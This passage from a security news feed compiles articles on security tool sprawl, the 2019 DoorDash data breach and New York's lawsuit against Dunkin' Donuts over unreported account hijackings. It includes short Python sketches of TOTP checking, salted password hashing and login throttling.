2. Take a platform-based approach to security, leveraging connectors and integrations. Look for platforms that offer layered security services across multiple use cases with a wide breadth of coverage either natively or with seamless technology integrations.

3. Segment your infrastructure based on intent. Logical segmentation can allow you to isolate critical assets. Network segmentation, microsegmentation, and macrosegmentation will all allow you to establish a secure environment and limit the exposure in distributed environments.

4. Take a unified approach to security monitoring. Ensure that you can centralize operations data and deploy strong tools to run analytics across a broad data set.

5. Implement strong, comprehensive access controls. Workflow-based multifactor authentication for users accessing applications and resources from devices can dramatically reduce, and even eliminate, the risk of security loopholes. (A minimal sketch of one such control appears below.)
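
As a concrete illustration of item 5, here is a minimal sketch of verifying a TOTP second factor (RFC 6238) in Python, using only the standard library; the 30-second step and six digits are the common defaults, not any particular product’s settings.

    import base64, hashlib, hmac, struct, time

    def totp(secret_b32, step=30, digits=6, t=None):
        """Compute the current RFC 6238 time-based one-time password."""
        key = base64.b32decode(secret_b32, casefold=True)
        counter = int((time.time() if t is None else t) // step)
        mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
        offset = mac[-1] & 0x0F
        code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
        return str(code).zfill(digits)

    # Server-side check: compare in constant time against what the user typed.
    def verify_second_factor(user_secret_b32, submitted_code):
        return hmac.compare_digest(totp(user_secret_b32), submitted_code)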

As the industry continues to adopt security tools delivered via convenient cloud services and SaaS-based procurement models, it will become increasingly important to identify and root out the inefficiencies and exposures caused by security tool sprawl. If you ignore this growing issue, potential data breaches could make the exorbitant costs and burdensome management associated with security tool sprawl the least of your worries. It’s the timeless “quality over quantity” argument. Businesses of all sizes must adopt simplified, unified security platforms that eliminate the need for so many point solutions — full stop.


Article source: https://www.darkreading.com/cloud/is-your-organization-suffering-from-security-tool-sprawl/a/d-id/1335868?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

DoorDash Breach Affects 4.9M Merchants, Customers, Workers

The May 4 incident exposed data belonging to users who joined the platform on or before April 5, 2018.

Food delivery service DoorDash this week confirmed a data breach exposing information belonging to 4.9 million consumers, merchants, and delivery workers on its platform.

DoorDash learned of “unusual activity involving a third-party service provider,” which it did not specify, earlier this month. An investigation revealed an unauthorized party accessed some DoorDash data on May 4, 2019. While the company says it took “immediate steps” to block further access by the intruder, it’s unclear why the breach took nearly five months to notice.

Those who joined the platform on or before April 5, 2018 are affected by the breach; those who joined after April 5, 2018 are not. DoorDash is reaching out to users whose data was exposed.

The type of user data compromised could include profile information such as names, email addresses, delivery addresses, order history, phone numbers, and hashed, salted passwords. Attackers may have also obtained the last four digits of some consumers’ payment cards; however, DoorDash emphasizes full payment card numbers and CVVs were not accessed.
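
For readers wondering what “hashed, salted” buys, here is a minimal sketch in Python using the standard library’s PBKDF2; DoorDash hasn’t disclosed its actual scheme, so treat this as illustrative only.

    import hashlib, hmac, os

    def hash_password(password, salt=None):
        """Return (salt, digest); a fresh random salt per user defeats rainbow tables."""
        salt = os.urandom(16) if salt is None else salt
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
        return salt, digest

    def verify(password, salt, expected_digest):
        """Constant-time comparison against the stored digest."""
        return hmac.compare_digest(hash_password(password, salt)[1], expected_digest)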

For some merchants and delivery workers, or “Dashers,” the last four digits of bank account numbers were compromised. Full bank account information was not. Approximately 100,000 Dashers also had their driver’s license numbers compromised in the breach.

DoorDash reports it has added security measures around its data, improved security protocols that grant access to its systems, and hired outside security experts for better threat detection.

Read more details here.


Article source: https://www.darkreading.com/vulnerabilities---threats/doordash-breach-affects-49m-merchants-customers-workers/d/d-id/1335938?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Dunkin do-nots: Deep-fried cake maker did not warn its sugar addicts that crooks raided web accounts, says NY AG

The US state of New York is suing food chain Dunkin’ Donuts for what it says is an illegal lapse in computer security.

NY Attorney General Letitia James said today the complaint stems from a 2015 raid on Dunkin’s website: fraudsters broke into individual customer accounts, stole those victims’ payment card info from the compromised Dunkin profiles, and sold that sensitive information online.

As many as 20,000 customer records were put up for sale on data-trading darknet markets, while Dunkin hushed up the theft, it is claimed. No one was alerted to the account hijackings, and no investigation took place, we’re told.

“Dunkin’ failed to take any steps to protect these nearly 20,000 customers — or the potentially thousands more they did not know about — by notifying them of unauthorized access, resetting their account passwords to prevent further unauthorized access, or freezing their DD cards,” the AG’s office said of the suit.

“Dunkin’ also failed to conduct any investigation into or analysis of the attacks to determine how many more customer accounts had been compromised, what customer information had been acquired, and whether customer funds had been stolen.”

According to James, the crooks brute-forced their way into these customer accounts by simply guessing people’s passwords.
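
One basic defence against this kind of guessing is throttling repeated failed logins per account. A minimal sketch in Python, with illustrative thresholds (not anything Dunkin’ actually runs):

    import time
    from collections import defaultdict, deque

    WINDOW, LIMIT = 300, 5          # allow five failures per five minutes
    failures = defaultdict(deque)   # account name -> timestamps of recent failures

    def allow_attempt(account):
        """Return False once an account has hit the failure limit in the window."""
        now = time.monotonic()
        recent = failures[account]
        while recent and now - recent[0] > WINDOW:
            recent.popleft()        # drop failures that have aged out
        return len(recent) < LIMIT

    def record_failure(account):
        failures[account].append(time.monotonic())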


The Attorney General alleges that DD was aware of the pilfering yet failed to notify punters that their accounts had been compromised.

“Dunkin’ failed to protect the security of its customers,” James said. “And instead of notifying the tens of thousands impacted by these cybersecurity breaches, Dunkin’ sat idly by, putting customers at risk.”

The Attorney General is now filing suit against the donut chain in hopes of getting back some of the money lost to the thieves, claiming the chain has violated the state’s data breach notification statute as well as consumer protection laws that require companies to accurately disclose the measures they take to protect customer accounts.

The lawsuit seeks an injunction against the sugar-slingers as well as a payout to customers and a fine for violating state laws. Dunkin’ did not have comment at time of going to press. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/26/dunkin_donuts_leak_suit/